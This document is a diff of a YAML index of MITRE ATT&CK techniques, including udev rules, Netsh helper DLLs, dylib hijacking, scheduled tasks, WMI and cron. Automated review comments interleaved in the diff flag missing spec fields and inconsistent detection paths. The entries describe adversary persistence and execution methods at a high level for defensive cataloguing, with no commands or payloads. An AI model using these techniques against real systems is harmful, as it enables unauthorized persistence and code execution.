+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1546.007:
technique:
x_mitre_platforms:
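Review bot: in the new T1546.017 entry the `x_mitre_detection` string is inconsistent with its own description: the description names five rule directories (`/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, `/lib/udev/rules.d/`) while the detection guidance lists only three, and the third (`/usr/lib/udev/rules.d/`) lacks the backticks the other two carry. Anyone deriving file-integrity or audit rules from this text should cover all five paths and the `RUN+=` keys inside them. If the text is copied verbatim from upstream, leave it here and raise the gap with ATT&CK rather than patching the mirror; the `atomic_tests: []` placeholder matches the other techniques that have no atomics yet.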
@@ -24176,7 +24497,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -24200,12 +24521,11 @@ privilege-escalation:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
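Review bot: `spec_version: '2.1'` is removed from T1546.007 here, and from every other technique object in this patch, with no replacement. `spec_version` is a required common property on STIX 2.1 domain objects, so any consumer that validates these technique blocks as STIX will now reject them; if the upstream bundle no longer carries the field, a line in the generator changelog or the index README saying so would save the next person from chasing it.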
@@ -24289,11 +24609,10 @@ privilege-escalation:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -24345,9 +24664,8 @@ privilege-escalation:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -24396,7 +24714,7 @@ privilege-escalation:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24434,30 +24752,29 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
execution:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
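Review bot: this hunk deletes `x_mitre_attack_spec_version: 2.1.0` from T1574.012 without adding a replacement, while the other techniques in this patch end up with `x_mitre_attack_spec_version: 3.2.0`; check that the field is emitted elsewhere in that object after the key reordering, otherwise T1574.012 is left without an ATT&CK spec version. Separately, the T1053.005 description is stored as a double-quoted folded string, so a one-sentence upstream edit rewraps the whole paragraph into a twenty-line diff; emitting it as a `|-` block scalar, as the generator already does for T1574.012 and T1047, would keep these diffs reviewable.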
@@ -24504,7 +24821,7 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -24536,8 +24853,8 @@ execution:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24551,6 +24868,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -24563,16 +24884,19 @@ execution:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1047:
technique:
- modified: '2024-04-11T18:13:25.130Z'
+ modified: '2024-10-15T15:20:57.328Z'
name: Windows Management Instrumentation
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -24638,7 +24962,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1047
atomic_tests: []
T1129:
@@ -24715,66 +25038,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1129
atomic_tests: []
T1059.007:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Cody Thomas, SpecterOps
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
- type: attack-pattern
- created: '2020-06-23T19:12:24.924Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1059.007
- url: https://attack.mitre.org/techniques/T1059/007
- - source_name: NodeJS
- url: https://nodejs.org/
- description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
- - source_name: JScrip May 2018
- url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
- description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
- June 23, 2020.
- - source_name: Microsoft JScript 2007
- url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
- description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
- ECMAScript …. Retrieved June 23, 2020.
- - source_name: Microsoft Windows Scripts
- url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
- description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
- June 23, 2020.
- - source_name: Apple About Mac Scripting 2016
- url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
- description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
- 14, 2021.
- - source_name: SpecterOps JXA 2020
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
- 2021.
- - source_name: SentinelOne macOS Red Team
- url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
- description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
- APIs Without Building Binaries. Retrieved July 17, 2020.'
- - source_name: Red Canary Silver Sparrow Feb2021
- url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
- description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
- wings: Outing macOS malware before it takes flight. Retrieved April 20,
- 2021.'
- - source_name: MDSec macOS JXA and VSCode
- url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
- description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
- with VSCode Extensions. Retrieved April 20, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-07-30T14:12:52.698Z'
name: 'Command and Scripting Interpreter: JavaScript'
description: |-
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
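Review bot: almost all of this hunk is key reordering rather than a content change: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the entire `external_references` list are deleted here and re-emitted lower in the same T1059.007 object. A stable key order in the index generator (sorted, or pinned to the upstream order) would shrink this to the few lines that actually changed and make the `modified` bump and the reference edits visible at a glance.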
@@ -24787,31 +25055,83 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_contributors:
+ - Cody Thomas, SpecterOps
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through osascript
and usage of OSAScript
API that may be related to other suspicious behavior occurring on the system.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+ created: '2020-06-23T19:12:24.924Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/007
+ external_id: T1059.007
+ - source_name: Apple About Mac Scripting 2016
+ description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+ 14, 2021.
+ url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+ - source_name: MDSec macOS JXA and VSCode
+ description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+ with VSCode Extensions. Retrieved April 20, 2021.
+ url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+ - source_name: Microsoft JScript 2007
+ description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+ ECMAScript …. Retrieved June 23, 2020.
+ url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+ - source_name: Microsoft Windows Scripts
+ description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+ - source_name: JScrip May 2018
+ description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+ - source_name: NodeJS
+ description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+ url: https://nodejs.org/
+ - source_name: SentinelOne macOS Red Team
+ description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+ APIs Without Building Binaries. Retrieved July 17, 2020.'
+ url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+ - source_name: SpecterOps JXA 2020
+ description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+ 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: Red Canary Silver Sparrow Feb2021
+ description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+ wings: Outing macOS malware before it takes flight. Retrieved April 20,
+ 2021.'
+ url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.007
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
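Review bot: `x_mitre_permissions_required` (User, Administrator, SYSTEM) is removed from T1059.007 with no replacement, whereas T1053.003 later in this patch keeps `x_mitre_permissions_required: - User`; confirm this reflects the upstream ATT&CK object rather than a field dropped during regeneration. The re-emitted `external_references` list also now places `description` before `url` and changes the entry order, which is harmless but worth one line in the PR description so reviewers know the reordering is intentional.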
@@ -24869,9 +25189,8 @@ execution:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1559.002:
@@ -24963,20 +25282,19 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1559.002
atomic_tests: []
T1204.002:
technique:
- modified: '2023-04-21T12:22:19.740Z'
+ modified: '2024-09-25T20:50:34.876Z'
name: 'User Execution: Malicious File'
description: "An adversary may rely upon a user opening a malicious file in
order to gain execution. Users may be subjected to social engineering to get
them to open a file that will lead to code execution. This user action will
typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
Adversaries may use several types of files that require a user to execute
- them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
- may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+ them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+ .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
to increase the likelihood that a user will open and successfully execute
a malicious file. These methods may include using a familiar naming convention
@@ -25004,7 +25322,7 @@ execution:
- Linux
- macOS
- Windows
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -25024,33 +25342,13 @@ execution:
url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1204.002
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -25067,6 +25365,7 @@ execution:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -25077,9 +25376,13 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -25087,8 +25390,24 @@ execution:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1559.001:
@@ -25128,7 +25447,7 @@ execution:
description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
Application COM Object. Retrieved November 21, 2017.
source_name: Enigma MMC20 COM Jan 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-07-26T22:51:20.448Z'
name: Component Object Model
description: |-
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
@@ -25153,12 +25472,10 @@ execution:
- 'Script: Script Execution'
- 'Process: Process Creation'
x_mitre_remote_support: true
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
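Review bot: as with T1574.012 earlier, this hunk deletes `x_mitre_attack_spec_version: 2.1.0` and `spec_version` from T1559.001 without adding `x_mitre_attack_spec_version: 3.2.0`, and the object goes straight from `x_mitre_remote_support: true` to `atomic_tests: []` with no `identifier:` line, unlike T1053.005, T1047 and T1129 which each carry one. Verify the generator emits both fields for this technique.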
@@ -25238,11 +25555,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.002:
technique:
- modified: '2024-03-01T19:06:05.126Z'
+ modified: '2024-10-15T14:18:20.087Z'
name: 'Command and Scripting Interpreter: AppleScript'
description: |-
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -25302,12 +25618,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.002
atomic_tests: []
T1106:
technique:
- modified: '2023-10-13T16:01:07.538Z'
+ modified: '2024-09-12T15:25:57.058Z'
name: Native API
description: |-
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25405,9 +25720,9 @@ execution:
2021.
url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- source_name: Microsoft Win32
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
@@ -25424,19 +25739,18 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
